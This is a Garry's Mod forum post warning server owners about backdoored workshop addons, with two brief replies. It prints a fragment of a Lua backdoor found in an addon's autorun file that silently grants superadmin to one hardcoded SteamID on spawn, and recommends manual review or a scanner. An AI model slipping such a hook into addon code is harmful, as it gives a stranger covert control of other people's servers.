As I'm not too sure if most people who play Garrysmod are aware about backdoor addons I'm making this to open the eyes to those who are unaware and may find themselves in the position of Server Manager or hosting their own custom server. In anyway people should be aware of dangerous code lying in addons that seem innocent since most people's addon list consists of possibly hundreds of addons.

A backdoored addon usually disguises itself or is just a regular addon at heart. The problem lies in code that is hidden which can be activated if someone has the know how or if they inserted it to automatically run on server startup.

Example being:

if ( ply:SteamID() == "STEAM_0:1:47561717" ) then
ply:SetUserGroup("superadmin")
end

end
hook.Add("PlayerSpawn", "Backdoory1", door1)

This sets whoever enters the server with that SteamID as a superadmin.

This can be hid in multiple .lua files included with an addon. This backdoor was located in autorun/server/chef_playermodel_list.lua


Way to combat this would be:

Looking through every piece of code individually and removing any found backdoors (Long)

Or using Nomalua which will search for suspicious code and report it to you.

Even though backdoor addons haven't been very popular lately they can still be a threat and should be taken care of just to be safe.

These addons aren't just for setting superadmin but they can also ruin your clientside GMOD by redirecting you to their server whenever you start GMOD, or by executing other malicious code which may be doing who knows what to your Garrysmod or possibly your computer.

Point of this post is just to let people be aware of this and take precautions on what you download from the workshop.
(If anyone finds anything I said that is incorrect or out of date please tell me so that I don't spread misinformation. Thank you!)

Thank you for sharing this :).

2018 Goals for EgN
******
***** *******
*** ********************

Goddamn, I never knew this existed.